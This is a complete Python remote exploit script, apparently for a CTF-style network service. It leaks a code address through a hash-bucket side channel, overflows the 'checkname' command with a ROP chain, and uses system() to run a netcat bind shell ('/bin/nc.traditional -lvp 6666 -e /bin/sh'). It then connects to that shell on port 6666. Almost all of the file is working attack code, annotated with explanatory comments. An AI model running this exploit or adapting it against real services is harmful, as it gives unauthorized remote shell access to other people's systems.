  1. #!/usr/bin/env python
  2. #
  3. # Template for remote TCP exploit code, generated by PEDA
  4. #
  5. import os
  6. import sys
  7. import struct
  8. import resource
  9. import time
  10.  
  11.  
# 128 candidate registration names: a fixed 12-character prefix plus a 4-hex-digit
# suffix. exploit() walks this list with range(128) and records the index of the
# name that produced a hit as the recovered hash bucket, so presumably
# _hash(names[i]) == i for every i (the hash returns h & 127, i.e. 128 buckets) --
# verify with len({_hash(n) for n in names}) == 128 before relying on it.
names = ['AAAAAAAA0000' + suffix for suffix in [
    'FFC3', 'FFC1', 'FFB2', 'FFEF', 'FF88', 'FFB6', 'FF23', 'FFC7',
    'FFF3', 'FF89', 'FDC9', 'FFEC', 'FF6B', 'FFD0', 'FF95', 'FFBA',
    'FEF5', 'FFF5', 'FF6A', 'FF80', 'FF9D', 'FFD3', 'FFCE', 'FF09',
    'FFC6', 'FF0D', 'FFE9', 'FF64', 'FFA2', 'FFCA', 'FF25', 'FF28',
    'FF62', 'FF9C', 'FFFC', 'FFC0', 'FFA9', 'FFDC', 'FF45', 'FFDB',
    'FF6C', 'FF7C', 'FDC3', 'FF71', 'FF4D', 'FFB3', 'FF38', 'FFD2',
    'FEB7', 'FFF1', 'FFCB', 'FFB8', 'FF5B', 'FFFA', 'FFB4', 'FFFD',
    'FFDA', 'FF9A', 'FF75', 'FDD7', 'FFB0', 'FFE6', 'FF6F', 'FFDE',
    'FFE4', 'FF3D', 'FF98', 'FF74', 'FFF4', 'FE6A', 'FFD8', 'FF99',
    'FF8F', 'FF82', 'FFE1', 'FF13', 'FF97', 'FD52', 'FFEA', 'FFCD',
    'FFE3', 'FFCC', 'FF53', 'FE88', 'FFF2', 'FFFE', 'FF1F', 'FF73',
    'FF66', 'FF83', 'FFD6', 'FF3A', 'FFF8', 'FE36', 'FFE8', 'FFE5',
    'FFCF', 'FEA0', 'FFF6', 'FEE1', 'FFD9', 'FF5F', 'FF7A', 'FFE0',
    'FFEB', 'FFC8', 'FFFB', 'FFF9', 'FF34', 'FFDF', 'FFF7', 'FFAA',
    'FF50', 'FFD5', 'FD09', 'FFED', 'FFA0', 'FE93', 'FF8C', 'FDB6',
    'FFF0', 'FEFD', 'FFEE', 'FF91', 'FE72', 'FF56', 'FFD7', 'FF4B',
]]
  45.  
  46.  
  47. from socket import *
  48. import telnetlib
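class TCPClient():
    """Minimal blocking TCP client used by the PEDA exploit template.

    Wraps one connected stream socket and optionally traces traffic:
    ``debug`` > 0 prints every receive, ``debug`` > 1 also prints sends.
    The connection is opened eagerly in ``__init__``; no socket timeout is
    set, so every receive blocks until data arrives or the peer closes.
    """

    def __init__(self, host, port, debug=0):
        # A failed connect propagates socket.error to the caller.
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.connect((host, port))

    def debug_log(self, size, data, cmd):
        """Print one trace line ``cmd(size): repr(data)`` when debug is enabled."""
        if self.debug != 0:
            # Parenthesised single argument prints the same under Python 2 and 3.
            print("%s(%d): %s" % (cmd, size, repr(data)))

    def send(self, data, delay=0):
        """Send ``data`` after an optional ``delay`` in seconds; return bytes sent.

        A single socket.send() may transmit fewer bytes than requested; the
        short count is returned and nothing is retried here.
        """
        if delay:
            time.sleep(delay)
        nsend = self.sock.send(data)
        if self.debug > 1:
            self.debug_log(nsend, data, "send")
        return nsend

    def sendline(self, data, delay=0):
        """Send ``data`` followed by a newline; return bytes sent."""
        return self.send(data + "\n", delay)

    def recv(self, size=1024, delay=0):
        """Receive at most ``size`` bytes after an optional ``delay`` in seconds."""
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        """Read one byte at a time until ``delim`` occurs in the buffer.

        Returns everything read, ``delim`` included. If the peer closes the
        connection first, recv() returns an empty string forever; the
        original looped on that, so EOF now ends the read and the partial
        buffer is returned instead.
        """
        buf = ""
        while True:
            c = self.sock.recv(1)
            if not c:
                break  # EOF from the peer: stop instead of spinning on ""
            buf += c
            if delim in buf:
                break
        self.debug_log(len(buf), buf, "recv")
        return buf

    def recvline(self):
        """Receive up to and including the next newline."""
        return self.recv_until("\n")

    def close(self):
        """Close the underlying socket."""
        self.sock.close()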
  95.  
  96. # ================================================================================
def is_index(data):
    """Return True when a checkname response does not contain the word 'not'.

    exploit() counts such a response as a hit. The server's exact wording is
    not visible in this file; 'not' is presumably part of its negative reply.
    """
    return 'not' not in data
  99.  
  100. # ================================================================================
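def _hash(tohash):
    """Compute the 7-bit bucket (0..127) of the name hash used by the exploit.

    Presumably a re-implementation of the target's own name hash, so the
    client can predict which bucket a registration name lands in. Every
    intermediate value is truncated to 32 bits, mirroring unsigned C
    arithmetic. Accepts a str (as in the original Python 2 code) or a
    bytes-like object, whose elements are already ints on Python 3.
    """
    mask = 0xffffffff
    h = 0xfee13117
    for c in tohash:
        b = c if isinstance(c, int) else ord(c)
        h = (h ^ b) & mask
        h = (h + (h << 11)) & mask
        h = (h ^ (h >> 7)) & mask
        h = (h - b) & mask

    # Final avalanche: same steps as the original, masked after each one.
    h = (h + (h << 3)) & mask
    h = (h ^ (h >> 10)) & mask
    h = (h + (h << 15)) & mask
    h = (h - (h >> 17)) & mask

    return h & 127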
  123.  
  124. # ================================================================================
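def hash_address(address):
    """Return the hash bucket of the checkname string that carries ``address``.

    ``address`` is a hex string such as '0x12345678'. It is packed as a
    32-bit little-endian value between the fixed 'AAAABBBBCCCC' prefix and
    a trailing 0x04 byte, the same layout gen_dict() hashes one byte at a
    time. Bytes literals keep the concatenation with struct.pack() valid on
    Python 3 (on Python 2, b'' is a plain str, so behaviour is unchanged);
    under Python 3 this needs _hash() to accept a bytes object.
    Raises ValueError for a non-hex string and struct.error if the value
    does not fit in 32 bits.
    """
    packed = struct.pack('<L', int(address, 16))
    return _hash(b'AAAABBBBCCCC' + packed + b'\x04')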
  127.  
  128. # ================================================================================
def gen_dict(currlen, knownpart):
    """Map every candidate byte value 0..255 to its hash bucket.

    The hashed string is the fixed 'AAAABBBBCCCC' prefix, (3 - currlen)
    'D' padding bytes, the candidate byte, the already recovered bytes in
    ``knownpart`` and a trailing '\\x04' -- the same shape as the checkname
    probes sent by exploit(). Returns {byte_value: bucket}.
    """
    padding = 'D' * (3 - currlen)
    return {
        candidate: _hash('AAAABBBBCCCC' + padding + chr(candidate) + knownpart + '\x04')
        for candidate in range(256)
    }
  135.  
  136. # ================================================================================
def get_hashbytes(key, gdict):
    """Return hex strings of every byte value in ``gdict`` whose bucket is ``key``.

    ``gdict`` is indexed 0..len(gdict)-1 (as built by gen_dict()) and maps a
    byte value to its hash bucket. Results are in ascending byte order; an
    empty list means no candidate byte hashes to ``key``.
    """
    return [hex(value) for value in range(len(gdict)) if gdict[value] == key]
  144.  
  145. # ================================================================================
def clean_list(l2, l3):
    """Drop position pairs that cannot contribute to an address.

    The pair (l2[i], l3[i]) survives only when l3[i] is non-empty (at least
    one candidate for the next byte) and l2[i] is not the zero byte.
    Returns the two filtered lists, still aligned by position.
    """
    survivors = [
        (second, third)
        for second, third in zip(l2, l3)
        if third and int(second, 16) != 0
    ]
    seconds = [second for second, _ in survivors]
    thirds = [third for _, third in survivors]
    return seconds, thirds
  155.  
  156. # ================================================================================
def parse_hashes(keys):
    """Turn the recovered hash buckets back into candidate 32-bit addresses.

    ``keys`` holds the bucket values found by the brute force in exploit();
    keys[0..2] are inverted here, keys[3] is not used (exploit() checks it
    afterwards with hash_address()). Each byte is inverted by hashing all 256
    values through gen_dict()/get_hashbytes(); because different bytes can
    share a bucket, the result is a list of candidates. keys[0] corresponds
    to the byte placed right before the trailing 0x04 in the hashed string,
    which is the top byte of the little-endian packed address, so candidate
    strings are '0x<b1><b2><b3>35' with the lowest byte fixed at 0x35.
    Raises IndexError if no byte value hashes to keys[0] (l1 empty).
    """
    kpart = ''

    # Top byte: only the first candidate is kept; further matches are dropped.
    l1 = get_hashbytes(keys[0], gen_dict(0, kpart))
    kpart += chr( int(l1[0], 16))

    # Second byte: every candidate, given the top-byte guess already in kpart.
    l2 = get_hashbytes(keys[1], gen_dict(1, kpart))

    # Third byte: one candidate list per second-byte candidate, same order as l2.
    l3 = list()
    for i in range(len(l2)):
        l3.append(get_hashbytes(keys[2], gen_dict(2, chr(int(l2[i],16))+kpart)))

    # Discard second-byte candidates that are zero or have no third-byte match.
    (l2, l3) = clean_list(l2, l3)

    # print 'l1:',l1
    # print 'l2:',l2
    # print 'l3:',l3

    # r has the single key l1[0]; md maps each second-byte candidate to its
    # third-byte candidate list.
    md = dict()
    r = dict()
    for i in range(len(l2)):
        md[ l2[i] ] = l3[i]
    r[ l1[0] ] = md

    #print 'merged:', r

    # Flatten the nested candidates into address strings; lowest byte is 0x35.
    cl = list()
    for d1 in r:
        for d2 in r[d1]:
            for d3 in r[d1][d2]:
                addr = '0x%02x%02x%02x35' % (int(d1,16) , int(d2,16) , int(d3,16))
                cl.append( addr )
                #print addr
    return cl
  191.  
  192. # ================================================================================
def build_rop(baseaddress, leakaddress):
    """Assemble the ROP chain that exploit() appends after 44 bytes of padding.

    ``baseaddress`` is the recovered load address of the target binary and
    ``leakaddress`` the address of checkname+117 it was derived from. All
    gadget, data and libc offsets below are hard-coded and presumably valid
    only for one specific build of the binary and its libc. The chain copies
    ``ncstr`` four bytes at a time into the 'registrations' buffer and then
    calls system() on it followed by exit(). Returns a packed little-endian
    byte string. Python 2 only: str slices of ncstr are concatenated with
    struct.pack() output. Note for detection: the command string is sent in
    cleartext inside the 'checkname' request.
    """
    _dummy      = struct.pack('<L', 0x41414141)
    popretn     = struct.pack('<L', baseaddress + 0x19bc) # pop ebx
    # Adding 0xffe871ab / 0xffe912eb modulo 2**32 is a subtraction from the
    # leaked pointer; the results are presumably libc's exit and system.
    _exit       = struct.pack('<L', (leakaddress+ 0xffe871ab) & 0xffffffff)
    _system     = struct.pack('<L', (leakaddress+ 0xffe912eb) & 0xffffffff)
    ncstr       = '/bin/nc.traditional -lvp 6666 -e /bin/sh'  # 40 chars: 10 x 4 bytes
   
    # build rop part to copy ncstr to 'registrations'
    rop = popretn # pop ebx
    for i in range(10):
        rop += ncstr[(i*4) : (i*4) + 4]  # next 4 bytes of ncstr, popped into ebx
        rop += struct.pack('<L', baseaddress + 0x29b3) # mov edx ebx ; mov eax ecx ; pop ebx ;
        rop += struct.pack('<L', baseaddress + 0x927c + (i * 4)) # address @ registrations
        # store lands at [ebx+4] = base + 0x9280 + 4*i; 0x9280 == 37504 used below
        rop += struct.pack('<L', baseaddress + 0x44b8) # mov [ebx+0x4] edx ; pop ebx ;;
    rop += _dummy   # dummy for the last pop ebx ..

    # build 'system and exit' stack frame
    rop += _system  # libc_system
    rop += popretn  # pop return to exit
    rop += struct.pack('<L', baseaddress + 37504) # ptr to 'registrations' (0x9280), system() argument
    rop += _exit
    rop += _dummy
    rop += struct.pack('<L', 0xffff1337) # exit code

    return rop
  218.  
  219. # ================================================================================
def shell_client(host, port):
    """Attach an interactive telnet session to host:port until Ctrl-C.

    Connects with TCPClient, hands the raw socket to telnetlib.Telnet and
    runs its interact() loop; a KeyboardInterrupt ends the session quietly.
    telnetlib is deprecated since Python 3.11 and removed in 3.13.
    """
    session = TCPClient(host, int(port), debug=0)
    try:
        remote = telnetlib.Telnet()
        remote.sock = session.sock
        remote.interact()
        remote.close()
    except KeyboardInterrupt:
        pass
  230.  
  231. # ================================================================================
def exploit(host, port, delaytime, dontwait=True):
    """Run the full sequence: recover the checkname address, then send the overflow.

    Phase 1 (brute force): for each of four unknown address bytes, register
    each name in ``names`` in turn and send four 'checkname' probes; when
    the 2nd and 4th replies both count as hits, the index of that name is
    recorded as the byte's hash bucket (presumably names[i] hashes to
    bucket i). Phase 2: parse_hashes() turns the first three buckets into
    candidate addresses and hash_address() against the fourth picks one;
    the binary base is that address minus checkname117. Phase 3: a new
    connection receives 'checkname ' + 44 bytes of padding + build_rop(),
    then shell_client() attaches to port 6666.

    host/port: target; delaytime: seconds slept before every sendline;
    dontwait=False pauses for Enter before the overflow and the shell.
    Every Exception is caught and printed, so failures surface only as
    '[-] Error: ...' without a traceback. Python 2 only (print statements,
    raw_input). Phase 1 never terminates if no name produces a hit.
    """
    checkname117 = 10293  # offset of checkname+117 from the binary's base (hard-coded)
    try:
        byteindex = 0
        hashes = list()

        port = int(port)
        client = TCPClient(host, port, debug=0)
        client.recvline()
        print '[+] Bruteforcing checkname...'
        # byteindex only advances on a hit, so this loop has no other exit.
        while byteindex != 4:
            for nameindex in range(128):
                client.sendline('addreg %s 64 1.1.1.1' % (names[nameindex]), delay=delaytime)
                client.sendline('isup h4x 1337', delay=delaytime)
                matchcount = 0
                for checkindex in range(4):
                    # 12-char prefix padded with 'D' to 15, 14, 13, 12 chars: the same
                    # shape gen_dict() hashes with (3 - currlen) 'D's.
                    client.sendline('checkname '+'AAAABBBBCCCC'.ljust(15 - byteindex, 'D'), delay=delaytime)
                    r = client.recvline()
                    # check every 2nd response
                    if ((checkindex+1) % 2 == 0):
                        if is_index(r.strip()):
                            matchcount += 1
                # presumably undoes the registration before the next candidate
                client.sendline('addreg %s 0 0.0.0.0' % (names[nameindex]), delay=delaytime)
                if matchcount == 2:  # both sampled replies were hits
                    print '[+] Byte(%d) hash(%d) found' % (byteindex+1, nameindex)
                    hashes.append( nameindex )
                    byteindex += 1
                    break

        client.sendline('quit', delay=delaytime)
        client.close()
        print '[+] Hashes: ' + ' '.join((str(h)) for h in hashes)

        # The fourth bucket is the hash of the full address; it disambiguates
        # the candidates built from the first three.
        addresses = parse_hashes(hashes)
        baseaddress = 0
        for address in addresses:
            if hashes[3] == hash_address( address ):
                print '[+] Address checkname+117 => %s' % (address)
                baseaddress = (int(address, 16) - checkname117)
                break

        # baseaddress is non-zero only after the break above, so 'address'
        # below is the matched candidate.
        if baseaddress:
            payload = 44 * 'A' + build_rop(baseaddress, int(address, 16))

            if not dontwait:
                raw_input("Press enter to expoit!")
            print '[+] Sending exploit...'
            port = int(port)
            client = TCPClient(host, port, debug=0)
            client.recvline()

            client.send('checkname ' + payload)

            client.sendline('quit', delay=delaytime)
            client.close()

            if not dontwait:
                raw_input("Connect to shell?")

            print '[+] Connecting to shell...'
            shell_client(host, '6666')

    except Exception as e:
        # Broad catch: the traceback is lost, only the message is shown.
        print '[-] Error: %s' % (e)
  296.  
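if __name__ == "__main__":
    # Usage: HOST PORT. The fixed 0.1 s is the delaytime slept before every
    # sendline (see TCPClient.send).
    if len(sys.argv) == 3:
        exploit(sys.argv[1], sys.argv[2], 0.1)
    else:
        # The original exited silently on a wrong argument count.
        sys.stderr.write("usage: %s HOST PORT\n" % sys.argv[0])
        sys.exit(2)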